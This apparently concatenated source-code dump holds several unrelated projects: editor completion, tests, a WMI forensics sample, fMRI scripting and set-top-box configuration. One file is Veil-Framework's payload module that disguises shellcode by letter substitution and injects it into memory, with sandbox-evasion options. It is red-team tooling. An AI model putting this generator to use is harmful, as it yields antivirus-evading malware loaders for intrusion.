' TSServer executable: {0}'.format( PATH_TO_TSSERVER ) )
def _LogLevel():
return 'verbose' if _logger.isEnabledFor( logging.DEBUG ) else 'normal'
def _ConvertCompletionData( completion_data ):
return responses.BuildCompletionData(
insertion_text = completion_data[ 'name' ],
menu_text = completion_data[ 'name' ],
kind = completion_data[ 'kind' ],
extra_data = completion_data[ 'kind' ]
)
def _ConvertDetailedCompletionData( completion_data, padding = 0 ):
name = completion_data[ 'name' ]
display_parts = completion_data[ 'displayParts' ]
signature = ''.join( [ p[ 'text' ] for p in display_parts ] )
# needed to strip new lines and indentation from the signature
signature = re.sub( '\s+', ' ', signature )
menu_text = '{0} {1}'.format( name.ljust( padding ), signature )
return responses.BuildCompletionData(
insertion_text = name,
menu_text = menu_text,
kind = completion_data[ 'kind' ]
)
def _BuildFixItChunkForRange( new_name,
file_contents,
file_name,
source_range ):
""" returns list FixItChunk for a tsserver source range """
return responses.FixItChunk(
new_name,
responses.Range(
start = _BuildLocation( file_contents,
file_name,
source_range[ 'start' ][ 'line' ],
source_range[ 'start' ][ 'offset' ] ),
end = _BuildLocation( file_contents,
file_name,
source_range[ 'end' ][ 'line' ],
source_range[ 'end' ][ 'offset' ] ) ) )
def _BuildFixItChunksForFile( request_data, new_name, file_replacement ):
""" returns a list of FixItChunk for each replacement range for the
supplied file"""
# On windows, tsserver annoyingly returns file path as C:/blah/blah,
# whereas all other paths in Python are of the C:\\blah\\blah form. We use
# normpath to have python do the conversion for us.
file_path = os.path.normpath( file_replacement[ 'file' ] )
file_contents = utils.SplitLines( GetFileContents( request_data, file_path ) )
return [ _BuildFixItChunkForRange( new_name, file_contents, file_path, r )
for r in file_replacement[ 'locs' ] ]
def _BuildLocation( file_contents, filename, line, offset ):
return responses.Location(
line = line,
# tsserver returns codepoint offsets, but we need byte offsets, so we must
# convert
column = utils.CodepointOffsetToByteOffset( file_contents[ line - 1 ],
offset ),
filename = filename )
| gpl-3.0 | -6,037,105,945,986,100,000 | 32.844275 | 119 | 0.597483 | false |
Veil-Framework/Veil | tools/evasion/payloads/python/shellcode_inject/letter_substitution.py | 1 | 9106 | """
Currently, this code takes normal shellcode, and replaces the a hex character
with a random non hex letter. At runtime,
the executables reverses the letter substitution and executes the shellcode
Letter substitution code was adapted from:
http://www.tutorialspoint.com/python/string_maketrans.htm
Module built by @christruncer
Contributed to by @EdvardHolst
"""
import random
import string
from datetime import date
from datetime import timedelta
from tools.evasion.evasion_common import encryption
from tools.evasion.evasion_common import evasion_helpers
from tools.evasion.evasion_common import gamemaker
from tools.evasion.evasion_common import shellcode_help
class PayloadModule:
def __init__(self, cli_obj):
# required options
self.description = "A letter used in shellcode is replaced with a different letter. At runtime, the exe reverses the letter substitution and executes the shellcode"
self.language = "python"
self.rating = "Excellent"
self.extension = "py"
self.hex_letters = "abcdefx"
self.non_hex_letters = "ghijklmnopqrstuvwyz"
self.name = "Python Letter Substitution"
self.path = "python/shellcode_inject/letter_substitution"
self.shellcode = shellcode_help.Shellcode(cli_obj)
self.cli_opts = cli_obj
self.payload_source_code = ""
if cli_obj.ordnance_payload is not None:
self.payload_type = cli_obj.ordnance_payload
elif cli_obj.msfvenom is not None:
self.payload_type = cli_obj.msfvenom
elif not cli_obj.tool:
self.payload_type = ""
self.cli_shellcode = False
# options we require user interaction for- format is {OPTION : [Value, Description]]}
self.required_options = {
"COMPILE_TO_EXE" : ["Y", "Compile to an executable"],
"USE_PYHERION" : ["N", "Use the pyherion encrypter"],
"INJECT_METHOD" : ["Virtual", "Virtual, Void, or Heap"],
"EXPIRE_PAYLOAD" : ["X", "Optional: Payloads expire after \"Y\" days"],
"HOSTNAME" : ["X", "Optional: Required system hostname"],
"DOMAIN" : ["X", "Optional: Required internal domain"],
"PROCESSORS" : ["X", "Optional: Minimum number of processors"],
"USERNAME" : ["X", "Optional: The required user account"],
"CLICKTRACK" : ["X", "Optional: Minimum number of clicks to execute payload"],
"UTCCHECK" : ["FALSE", "Optional: Validates system does not use UTC timezone"],
"VIRTUALFILES" : ["FALSE", "Optional: Check if VM supporting files exist"],
"VIRTUALDLLS" : ["FALSE", "Check for dlls loaded in memory"],
"CURSORMOVEMENT" : ["FALSE", "Check if cursor is in same position after 30 seconds"],
"USERPROMPT" : ["FALSE", "Make user click prompt prior to execution"],
"MINRAM" : ["FALSE", "Check for at least 3 gigs of RAM"],
"SANDBOXPROCESS" : ["FALSE", "Check for common sandbox processes"],
"DETECTDEBUG" : ["FALSE", "Check if debugger is present"],
"SLEEP" : ["X", "Optional: Sleep \"Y\" seconds, check if accelerated"]
}
def generate(self):
# Random letter substition variables
encode_with_this = random.choice(self.hex_letters)
decode_with_this = random.choice(self.non_hex_letters)
# Generate Random Variable Names
subbed_shellcode_variable_name = evasion_helpers.randomString()
ShellcodeVariableName = evasion_helpers.randomString()
rand_decoded_letter = evasion_helpers.randomString()
rand_correct_letter = evasion_helpers.randomString()
rand_sub_scheme = evasion_helpers.randomString()
randctypes = evasion_helpers.randomString()
rand_ptr = evasion_helpers.randomString()
rand_ht = evasion_helpers.randomString()
rand_virtual_protect = evasion_helpers.randomString()
# Generate the shellcode
if not self.cli_shellcode:
Shellcode = self.shellcode.generate(self.cli_opts)
if self.shellcode.msfvenompayload:
self.payload_type = self.shellcode.msfvenompayload
elif self.shellcode.payload_choice:
self.payload_type = self.shellcode.payload_choice
self.shellcode.payload_choice = ""
# assume custom shellcode
else:
self.payload_type = 'custom'
else:
Shellcode = self.cli_shellcode
Shellcode = Shellcode.encode('unicode_escape')
Shellcode = Shellcode.decode('ascii')
Shellcode = Shellcode.replace(encode_with_this, decode_with_this).replace('\\', '\\\\')
payload_code, num_tabs_required = gamemaker.senecas_games(self)
# Add in the letter switching code
payload_code += '\t' * num_tabs_required + 'import codecs\n'
payload_code += '\t' * num_tabs_required + rand_decoded_letter + ' = b\'%s\'\n' % decode_with_this
payload_code += '\t' * num_tabs_required + rand_correct_letter + ' = b\'%s\'\n' % encode_with_this
payload_code += '\t' * num_tabs_required + rand_sub_scheme + ' = bytes.maketrans('+ rand_decoded_letter +', '+ rand_correct_letter + ')\n'
payload_code += '\t' * num_tabs_required + subbed_shellcode_variable_name + ' = b\'' + Shellcode.replace('\\\\', '\\') +'\'\n'
payload_code += '\t' * num_tabs_required + subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
payload_code += '\t' * num_tabs_required + subbed_shellcode_variable_name + ', _ = codecs.escape_decode(' + subbed_shellcode_variable_name + ')\n'
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
payload_code += '\t' * num_tabs_required + rand_ptr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len('+ subbed_shellcode_variable_name +')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x04))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + subbed_shellcode_variable_name + ',' + randctypes + '.c_int(len(' + subbed_shellcode_variable_name + ')))\n'
payload_code += '\t' * num_tabs_required + rand_virtual_protect + ' = ' + randctypes + '.windll.kernel32.VirtualProtect(' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(len(' + subbed_shellcode_variable_name + ')),' + randctypes + '.c_int(0x20),' + randctypes + '.byref(' + randctypes + '.c_uint32(0)))\n'
payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n'
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
HeapVar = evasion_helpers.randomString()
# Create Payload File
payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
payload_code += '\t' * num_tabs_required + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + subbed_shellcode_variable_name + ') * 2),' + randctypes + '.c_int(0))\n'
payload_code += '\t' * num_tabs_required + rand_ptr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + subbed_shellcode_variable_name + ')))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + subbed_shellcode_variable_name + ',' + randctypes + '.c_int(len(' + subbed_shellcode_variable_name + ')))\n'
payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
payload_code = encryption.pyherion(payload_code)
self.payload_source_code = payload_code
return
| gpl-3.0 | -4,467,505,317,799,974,000 | 64.985507 | 336 | 0.613222 | false |
dbarsam/python-vsgen | tests/__main__.py | 1 | 2305 | # -*- coding: utf-8 -*-
"""
This module executes vsgen unittests (i.e. all tests in the current folder). It exists as an alernative to the command line interface::
> python -m unittest discover --start-directory . --pattern test*.py
For more testing options see the unittest documentation available at https://docs.python.org/3.5/library/unittest.html.
This module exposes an __main__ entry point useful for test development (usually from an Python IDE) and not recommeded for normal test execution.
"""
import os
import sys
def main(argv=[]):
"""
Test main script
"""
import argparse
import unittest
parser = argparse.ArgumentParser(description='Executes the vsgen unit tests.', formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('-n', '--testname', help='Specifies the test name to execute. This must be the fully qualified \'dotted\' path of the form \'package.module.class.function\' (e.g. \'tests.unit.test_feature.TestClass.test_function\'). If not provided all tests resolved from the internal test discovery process are executed.', action='append')
parser.add_argument('-f', '--testpattern', help='Specifies the test file pattern to execute during test discovery. If not provided all tests resolved from the internal test discovery process are executed.', default='test*.py')
parser.add_argument('-p', '--testpath', help='Specifies the test path for test discovery. If not provided, the internal test discovery uses the current directory.', default=os.path.dirname(os.path.realpath(__file__)))
args = parser.parse_args(argv[1:])
loader = unittest.TestLoader()
if args.testname:
testsuite = loader.loadTestsFromNames(args.testname)
else:
testsuite = loader.discover(args.testpath, args.testpattern)
runner = unittest.TextTestRunner(verbosity=2)
result = runner.run(testsuite)
return 0 if not result.failures and not result.errors else 1
if __name__ == '__main__':
# To use this package as an application we need to correct the sys.path
module_path = os.path.dirname(os.path.realpath(__file__))
package_path = os.path.normpath(os.path.join(module_path, '..'))
if package_path not in sys.path:
sys.path.append(package_path)
sys.exit(main(sys.argv))
| mit | 1,336,034,135,707,171,300 | 51.386364 | 351 | 0.71974 | false |
pombredanne/https-gitlab.lrde.epita.fr-vcsn-vcsn | tests/python/complete.py | 1 | 1949 | #! /usr/bin/env python
import vcsn
from test import *
# check complete algorithm
# ------------------------
def check(i, o):
if isinstance(i, str):
i = vcsn.automaton(i)
CHECK(not i.is_complete())
o = vcsn.automaton(o)
CHECK(o.is_complete())
CHECK_EQ(o, i.complete())
# Idempotence.
CHECK_EQ(o, o.complete())
check('''
digraph
{
vcsn_context = "lal_char(abcd), b"
I -> 0
0 -> 1 [label = "a"]
0 -> 2 [label = "b"]
1 -> 2 [label = "c"]
2 -> F
}
''', '''
digraph
{
vcsn_context = "lal_char(abcd), b"
rankdir = LR
{
node [shape = point, width = 0]
I0
F2
}
{
node [shape = circle]
0
1
2
3 [color = DimGray]
}
I0 -> 0
0 -> 1 [label = "a"]
0 -> 2 [label = "b"]
0 -> 3 [label = "c, d", color = DimGray]
1 -> 2 [label = "c"]
1 -> 3 [label = "a, b, d", color = DimGray]
2 -> F2
2 -> 3 [label = "a, b, c, d", color = DimGray]
3 -> 3 [label = "a, b, c, d", color = DimGray]
}
''')
# An automaton with an open context.
check(vcsn.b.expression('a').standard(), '''
digraph
{
vcsn_context = "letterset<char_letters(a)>, b"
rankdir = LR
edge [arrowhead = vee, arrowsize = .6]
{
node [shape = point, width = 0]
I0
F1
}
{
node [shape = circle, style = rounded, width = 0.5]
0
1
2 [color = DimGray]
}
I0 -> 0
0 -> 1 [label = "a"]
1 -> F1
1 -> 2 [label = "a", color = DimGray]
2 -> 2 [label = "a", color = DimGray]
}
''')
# An automaton without initial state.
check('''
digraph
{
vcsn_context = "lal_char(a), b"
0 -> 0 [label = "a"]
0 -> F0
}
''', '''
digraph
{
vcsn_context = "lal_char(a), b"
rankdir = LR
{
node [shape = point, width = 0]
I1
F0
}
{
node [shape = circle]
0 [color = DimGray]
1 [color = DimGray]
}
I1 -> 1 [color = DimGray]
0 -> F0 [color = DimGray]
0 -> 0 [label = "a", color = DimGray]
1 -> 1 [label = "a", color = DimGray]
}
''')
| gpl-3.0 | 1,662,478,737,304,644,900 | 16.247788 | 55 | 0.50077 | false |
fireeye/flare-wmi | python-cim/samples/show_CCM_RecentlyUsedApps.py | 1 | 2035 | import logging
from cim import CIM
from cim.objects import Namespace
def main(type_, path):
if type_ not in ("xp", "win7"):
raise RuntimeError("Invalid mapping type: {:s}".format(type_))
Values = ["FolderPath", "ExplorerFileName", "FileSize", "LastUserName", "LastUsedTime", "TimeZoneOffset",
"LaunchCount", "OriginalFileName", "FileDescription", "CompanyName", "ProductName", "ProductVersion",
"FileVersion", "AdditionalProductCodes", "msiVersion", "msiDisplayName", "ProductCode",
"SoftwarePropertiesHash", "ProductLanguage", "FilePropertiesHash", "msiPublisher"]
print("\t".join(Values))
c = CIM(type_, path)
try:
with Namespace(c, "root\\ccm\\SoftwareMeteringAgent") as ns:
for RUA in ns.class_("CCM_RecentlyUsedApps").instances:
RUAValues = []
for Value in Values:
try:
if Value == "LastUsedTime":
Time = str(RUA.properties[Value].value)
ExcelTime = "{}-{}-{} {}:{}:{}".format(Time[0:4], Time[4:6], Time[6:8], Time[8:10],
Time[10:12], Time[12:14])
RUAValues.append(ExcelTime)
elif Value == "TimeZoneOffset":
Time = str(RUA.properties[Value].value)
TimeOffset = '="{}"'.format(Time[-4:])
RUAValues.append(TimeOffset)
else:
RUAValues.append(str(RUA.properties[Value].value))
except KeyError:
RUAValues.append("")
print("\t".join(RUAValues))
except IndexError:
raise RuntimeError("CCM Software Metering Agent path 'root\\\\ccm\\\\SoftwareMeteringAgent' not found.")
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO)
import sys
main(*sys.argv[1:])
| apache-2.0 | -777,082,851,250,680,000 | 43.23913 | 115 | 0.519902 | false |
poldrack/openfmri | openfmri_paper/2.8_make_allmean_file.py | 1 | 1497 | """
make alist of all contrasts/tasks
"""
import pickle
from get_contrasts_to_use import *
c=get_contrasts_to_use()
outdir='/corral-repl/utexas/poldracklab/openfmri/analyses/paper_analysis_Dec2012/data_prep'
infodir='/corral-repl/utexas/poldracklab/openfmri/analyses/paper_analysis_Dec2012/data_prep'
f=open(os.path.join(infodir,'task_keys.pkl'),'rb')
task_keys=pickle.load(f)
f.close()
f=open(os.path.join(infodir,'task_contrasts.pkl'),'rb')
contrasts=pickle.load(f)
f.close()
f=open(os.path.join(infodir,'task_conditions.pkl'),'rb')
condition_keys=pickle.load(f)
f.close()
taskctr={'ds001': {1: 1},
'ds002': {1: 2, 2: 3, 3: 4},
'ds003': {1: 5},
'ds005': {1: 6},
'ds006A': {1: 7},
'ds007': {1: 8, 2: 9, 3: 10},
'ds008': {1: 11, 2: 12},
'ds011': {1: 13, 2: 14, 3: 15, 4: 16},
'ds017': {2: 17},
'ds051': {1: 18},
'ds052': {1: 19, 2: 20},
'ds101': {1: 21},
'ds102': {1: 22},
'ds107': {1: 23}}
taskdict={}
for ds in taskctr.iterkeys():
for t in taskctr[ds].iterkeys():
taskdict[taskctr[ds][t]]=[ds,t,task_keys[ds]['task%03d'%t],c[ds][t][0],contrasts[ds]['task%03d'%t]['contrasts'][c[ds][t][0]]]
meanzstatdir='/corral-repl/utexas/poldracklab/openfmri/shared2/mean_zstat/'
outdir='/corral-repl/utexas/poldracklab/openfmri/analyses/paper_analysis_Dec2012/data_prep'
cmd='fslmerge -t %s/all_mean_zstat.nii.gz'%outdir
for t in range(1,24):
cmd += ' %s/mean_%s_task%03d_zstat%d_run1.nii.gz'%(meanzstatdir,taskdict[t][0],taskdict[t][1],taskdict[t][3])
print cmd
| bsd-2-clause | -8,475,441,843,590,455,000 | 27.245283 | 133 | 0.651971 | false |
vitmod/enigma2-1 | lib/python/Components/config.py | 1 | 53976 | from enigma import getPrevAsciiCode
from Tools.NumericalTextInput import NumericalTextInput
from Tools.Directories import resolveFilename, SCOPE_CONFIG, fileExists
from Components.Harddisk import harddiskmanager
from copy import copy as copy_copy
from os import path as os_path
from time import localtime, strftime
# ConfigElement, the base class of all ConfigElements.
# it stores:
# value the current value, usefully encoded.
# usually a property which retrieves _value,
# and maybe does some reformatting
# _value the value as it's going to be saved in the configfile,
# though still in non-string form.
# this is the object which is actually worked on.
# default the initial value. If _value is equal to default,
# it will not be stored in the config file
# saved_value is a text representation of _value, stored in the config file
#
# and has (at least) the following methods:
# save() stores _value into saved_value,
# (or stores 'None' if it should not be stored)
# load() loads _value from saved_value, or loads
# the default if saved_value is 'None' (default)
# or invalid.
#
class ConfigElement(object):
def __init__(self):
self.extra_args = {}
self.saved_value = None
self.save_forced = False
self.last_value = None
self.save_disabled = False
self.__notifiers = None
self.__notifiers_final = None
self.enabled = True
self.callNotifiersOnSaveAndCancel = False
def getNotifiers(self):
if self.__notifiers is None:
self.__notifiers = [ ]
return self.__notifiers
def setNotifiers(self, val):
self.__notifiers = val
notifiers = property(getNotifiers, setNotifiers)
def getNotifiersFinal(self):
if self.__notifiers_final is None:
self.__notifiers_final = [ ]
return self.__notifiers_final
def setNotifiersFinal(self, val):
self.__notifiers_final = val
notifiers_final = property(getNotifiersFinal, setNotifiersFinal)
# you need to override this to do input validation
def setValue(self, value):
self._value = value
self.changed()
def getValue(self):
return self._value
value = property(getValue, setValue)
# you need to override this if self.value is not a string
def fromstring(self, value):
return value
# you can overide this for fancy default handling
def load(self):
sv = self.saved_value
if sv is None:
self.value = self.default
else:
self.value = self.fromstring(sv)
def tostring(self, value):
return str(value)
# you need to override this if str(self.value) doesn't work
def save(self):
if self.save_disabled or (self.value == self.default and not self.save_forced):
self.saved_value = None
else:
self.saved_value = self.tostring(self.value)
if self.callNotifiersOnSaveAndCancel:
self.changed()
def cancel(self):
self.load()
if self.callNotifiersOnSaveAndCancel:
self.changed()
def isChanged(self):
sv = self.saved_value
if sv is None and self.value == self.default:
return False
return self.tostring(self.value) != sv
def changed(self):
if self.__notifiers:
for x in self.notifiers:
try:
if self.extra_args[x]:
x(self, self.extra_args[x])
else:
x(self)
except:
x(self)
def changedFinal(self):
if self.__notifiers_final:
for x in self.notifiers_final:
try:
if self.extra_args[x]:
x(self, self.extra_args[x])
else:
x(self)
except:
x(self)
def addNotifier(self, notifier, initial_call = True, immediate_feedback = True, extra_args=None):
if not extra_args: extra_args = []
assert callable(notifier), "notifiers must be callable"
try:
self.extra_args[notifier] = extra_args
except: pass
if immediate_feedback:
self.notifiers.append(notifier)
else:
self.notifiers_final.append(notifier)
# CHECKME:
# do we want to call the notifier
# - at all when adding it? (yes, though optional)
# - when the default is active? (yes)
# - when no value *yet* has been set,
# because no config has ever been read (currently yes)
# (though that's not so easy to detect.
# the entry could just be new.)
if initial_call:
if extra_args:
notifier(self,extra_args)
else:
notifier(self)
def removeNotifier(self, notifier):
notifier in self.notifiers and self.notifiers.remove(notifier)
notifier in self.notifiers_final and self.notifiers_final.remove(notifier)
def disableSave(self):
self.save_disabled = True
def __call__(self, selected):
return self.getMulti(selected)
def onSelect(self, session):
pass
def onDeselect(self, session):
if not self.last_value == self.value:
self.changedFinal()
self.last_value = self.value
KEY_LEFT = 0
KEY_RIGHT = 1
KEY_OK = 2
KEY_DELETE = 3
KEY_BACKSPACE = 4
KEY_HOME = 5
KEY_END = 6
KEY_TOGGLEOW = 7
KEY_ASCII = 8
KEY_TIMEOUT = 9
KEY_NUMBERS = range(12, 12+10)
KEY_0 = 12
KEY_9 = 12+9
def getKeyNumber(key):
assert key in KEY_NUMBERS
return key - KEY_0
class choicesList(object): # XXX: we might want a better name for this
LIST_TYPE_LIST = 1
LIST_TYPE_DICT = 2
def __init__(self, choices, type = None):
self.choices = choices
if type is None:
if isinstance(choices, list):
self.type = choicesList.LIST_TYPE_LIST
elif isinstance(choices, dict):
self.type = choicesList.LIST_TYPE_DICT
else:
assert False, "choices must be dict or list!"
else:
self.type = type
def __list__(self):
if self.type == choicesList.LIST_TYPE_LIST:
ret = [not isinstance(x, tuple) and x or x[0] for x in self.choices]
else:
ret = self.choices.keys()
return ret or [""]
def __iter__(self):
if self.type == choicesList.LIST_TYPE_LIST:
ret = [not isinstance(x, tuple) and x or x[0] for x in self.choices]
else:
ret = self.choices
return iter(ret or [""])
def __len__(self):
return len(self.choices) or 1
def __getitem__(self, index):
if self.type == choicesList.LIST_TYPE_LIST:
ret = self.choices[index]
if isinstance(ret, tuple):
ret = ret[0]
return ret
return self.choices.keys()[index]
def index(self, value):
try:
return self.__list__().index(value)
except (ValueError, IndexError):
# occurs e.g. when default is not in list
return 0
def __setitem__(self, index, value):
if self.type == choicesList.LIST_TYPE_LIST:
orig = self.choices[index]
if isinstance(orig, tuple):
self.choices[index] = (value, orig[1])
else:
self.choices[index] = value
else:
key = self.choices.keys()[index]
orig = self.choices[key]
del self.choices[key]
self.choices[value] = orig
def default(self):
choices = self.choices
if not choices:
return ""
if self.type is choicesList.LIST_TYPE_LIST:
default = choices[0]
if isinstance(default, tuple):
default = default[0]
else:
default = choices.keys()[0]
return default
class descriptionList(choicesList): # XXX: we might want a better name for this
def __list__(self):
if self.type == choicesList.LIST_TYPE_LIST:
ret = [not isinstance(x, tuple) and x or x[1] for x in self.choices]
else:
ret = self.choices.values()
return ret or [""]
def __iter__(self):
return iter(self.__list__())
def __getitem__(self, index):
if self.type == choicesList.LIST_TYPE_LIST:
for x in self.choices:
if isinstance(x, tuple):
if x[0] == index:
return str(x[1])
elif x == index:
return str(x)
return str(index) # Fallback!
else:
return str(self.choices.get(index, ""))
def __setitem__(self, index, value):
if self.type == choicesList.LIST_TYPE_LIST:
i = self.index(index)
orig = self.choices[i]
if isinstance(orig, tuple):
self.choices[i] = (orig[0], value)
else:
self.choices[i] = value
else:
self.choices[index] = value
#
# ConfigSelection is a "one of.."-type.
# it has the "choices", usually a list, which contains
# (id, desc)-tuples (or just only the ids, in case the id
# will be used as description)
#
# all ids MUST be plain strings.
#
class ConfigSelection(ConfigElement):
def __init__(self, choices, default = None):
ConfigElement.__init__(self)
self.choices = choicesList(choices)
if default is None:
default = self.choices.default()
self._descr = None
self.default = self._value = self.last_value = default
def setChoices(self, choices, default = None):
self.choices = choicesList(choices)
if default is None:
default = self.choices.default()
self.default = default
if self.value not in self.choices:
self.value = default
def setValue(self, value):
if value in self.choices:
self._value = value
else:
self._value = self.default
self._descr = None
self.changed()
def tostring(self, val):
return val
def getValue(self):
return self._value
def setCurrentText(self, text):
i = self.choices.index(self.value)
self.choices[i] = text
self._descr = self.description[text] = text
self._value = text
value = property(getValue, setValue)
def getIndex(self):
return self.choices.index(self.value)
index = property(getIndex)
# GUI
def handleKey(self, key):
nchoices = len(self.choices)
if nchoices > 1:
i = self.choices.index(self.value)
if key == KEY_LEFT:
self.value = self.choices[(i + nchoices - 1) % nchoices]
elif key == KEY_RIGHT:
self.value = self.choices[(i + 1) % nchoices]
elif key == KEY_HOME:
self.value = self.choices[0]
elif key == KEY_END:
self.value = self.choices[nchoices - 1]
def selectNext(self):
nchoices = len(self.choices)
i = self.choices.index(self.value)
self.value = self.choices[(i + 1) % nchoices]
def getText(self):
if self._descr is not None:
return self._descr
descr = self._descr = self.description[self.value]
if descr:
return _(descr)
return descr
def getMulti(self, selected):
if self._descr is not None:
descr = self._descr
else:
descr = self._descr = self.description[self.value]
if descr:
return "text", _(descr)
return "text", descr
# HTML
def getHTML(self, id):
res = ""
for v in self.choices:
descr = self.description[v]
if self.value == v:
checked = 'checked="checked" '
else:
checked = ''
res += '<input type="radio" name="' + id + '" ' + checked + 'value="' + v + '">' + descr + "</input></br>\n"
return res
def unsafeAssign(self, value):
# setValue does check if value is in choices. This is safe enough.
self.value = value
description = property(lambda self: descriptionList(self.choices.choices, self.choices.type))
# a binary decision.
#
# several customized versions exist for different
# descriptions.
#
boolean_descriptions = {False: _("false"), True: _("true")}
class ConfigBoolean(ConfigElement):
def __init__(self, default = False, descriptions = boolean_descriptions):
ConfigElement.__init__(self)
self.descriptions = descriptions
self.value = self.last_value = self.default = default
def handleKey(self, key):
if key in (KEY_LEFT, KEY_RIGHT):
self.value = not self.value
elif key == KEY_HOME:
self.value = False
elif key == KEY_END:
self.value = True
def getText(self):
descr = self.descriptions[self.value]
if descr:
return _(descr)
return descr
def getMulti(self, selected):
descr = self.descriptions[self.value]
if descr:
return "text", _(descr)
return "text", descr
def tostring(self, value):
if not value:
return "false"
else:
return "true"
def fromstring(self, val):
if val == "true":
return True
else:
return False
def getHTML(self, id):
if self.value:
checked = ' checked="checked"'
else:
checked = ''
return '<input type="checkbox" name="' + id + '" value="1" ' + checked + " />"
# this is FLAWED. and must be fixed.
def unsafeAssign(self, value):
if value == "1":
self.value = True
else:
self.value = False
def onDeselect(self, session):
if not self.last_value == self.value:
self.changedFinal()
self.last_value = self.value
yes_no_descriptions = {False: _("no"), True: _("yes")}
class ConfigYesNo(ConfigBoolean):
def __init__(self, default = False):
ConfigBoolean.__init__(self, default = default, descriptions = yes_no_descriptions)
on_off_descriptions = {False: _("off"), True: _("on")}
class ConfigOnOff(ConfigBoolean):
def __init__(self, default = False):
ConfigBoolean.__init__(self, default = default, descriptions = on_off_descriptions)
enable_disable_descriptions = {False: _("disable"), True: _("enable")}
class ConfigEnableDisable(ConfigBoolean):
def __init__(self, default = False):
ConfigBoolean.__init__(self, default = default, descriptions = enable_disable_descriptions)
class ConfigDateTime(ConfigElement):
def __init__(self, default, formatstring, increment = 86400):
ConfigElement.__init__(self)
self.increment = increment
self.formatstring = formatstring
self.value = self.last_value = self.default = int(default)
def handleKey(self, key):
if key == KEY_LEFT:
self.value -= self.increment
elif key == KEY_RIGHT:
self.value += self.increment
elif key == KEY_HOME or key == KEY_END:
self.value = self.default
def getText(self):
return strftime(self.formatstring, localtime(self.value))
def getMulti(self, selected):
return "text", strftime(self.formatstring, localtime(self.value))
def fromstring(self, val):
return int(val)
# *THE* mighty config element class
#
# allows you to store/edit a sequence of values.
# can be used for IP-addresses, dates, plain integers, ...
# several helper exist to ease this up a bit.
#
class ConfigSequence(ConfigElement):
def __init__(self, seperator, limits, default, censor_char = ""):
ConfigElement.__init__(self)
assert isinstance(limits, list) and len(limits[0]) == 2, "limits must be [(min, max),...]-tuple-list"
assert censor_char == "" or len(censor_char) == 1, "censor char must be a single char (or \"\")"
#assert isinstance(default, list), "default must be a list"
#assert isinstance(default[0], int), "list must contain numbers"
#assert len(default) == len(limits), "length must match"
self.marked_pos = 0
self.seperator = seperator
self.limits = limits
self.censor_char = censor_char
self.last_value = self.default = default
self.value = copy_copy(default)
self.endNotifier = None
def validate(self):
max_pos = 0
num = 0
for i in self._value:
max_pos += len(str(self.limits[num][1]))
if self._value[num] < self.limits[num][0]:
self._value[num] = self.limits[num][0]
if self._value[num] > self.limits[num][1]:
self._value[num] = self.limits[num][1]
num += 1
if self.marked_pos >= max_pos:
if self.endNotifier:
for x in self.endNotifier:
x(self)
self.marked_pos = max_pos - 1
if self.marked_pos < 0:
self.marked_pos = 0
def validatePos(self):
if self.marked_pos < 0:
self.marked_pos = 0
total_len = sum([len(str(x[1])) for x in self.limits])
if self.marked_pos >= total_len:
self.marked_pos = total_len - 1
def addEndNotifier(self, notifier):
if self.endNotifier is None:
self.endNotifier = []
self.endNotifier.append(notifier)
def handleKey(self, key):
if key == KEY_LEFT:
self.marked_pos -= 1
self.validatePos()
elif key == KEY_RIGHT:
self.marked_pos += 1
self.validatePos()
elif key == KEY_HOME:
self.marked_pos = 0
self.validatePos()
elif key == KEY_END:
max_pos = 0
num = 0
for i in self._value:
max_pos += len(str(self.limits[num][1]))
num += 1
self.marked_pos = max_pos - 1
self.validatePos()
elif key in KEY_NUMBERS or key == KEY_ASCII:
if key == KEY_ASCII:
code = getPrevAsciiCode()
if code < 48 or code > 57:
return
number = code - 48
else:
number = getKeyNumber(key)
block_len = [len(str(x[1])) for x in self.limits]
total_len = sum(block_len)
pos = 0
blocknumber = 0
block_len_total = [0, ]
for x in block_len:
pos += block_len[blocknumber]
block_len_total.append(pos)
if pos - 1 >= self.marked_pos:
pass
else:
blocknumber += 1
# length of numberblock
number_len = len(str(self.limits[blocknumber][1]))
# position in the block
posinblock = self.marked_pos - block_len_total[blocknumber]
oldvalue = self._value[blocknumber]
olddec = oldvalue % 10 ** (number_len - posinblock) - (oldvalue % 10 ** (number_len - posinblock - 1))
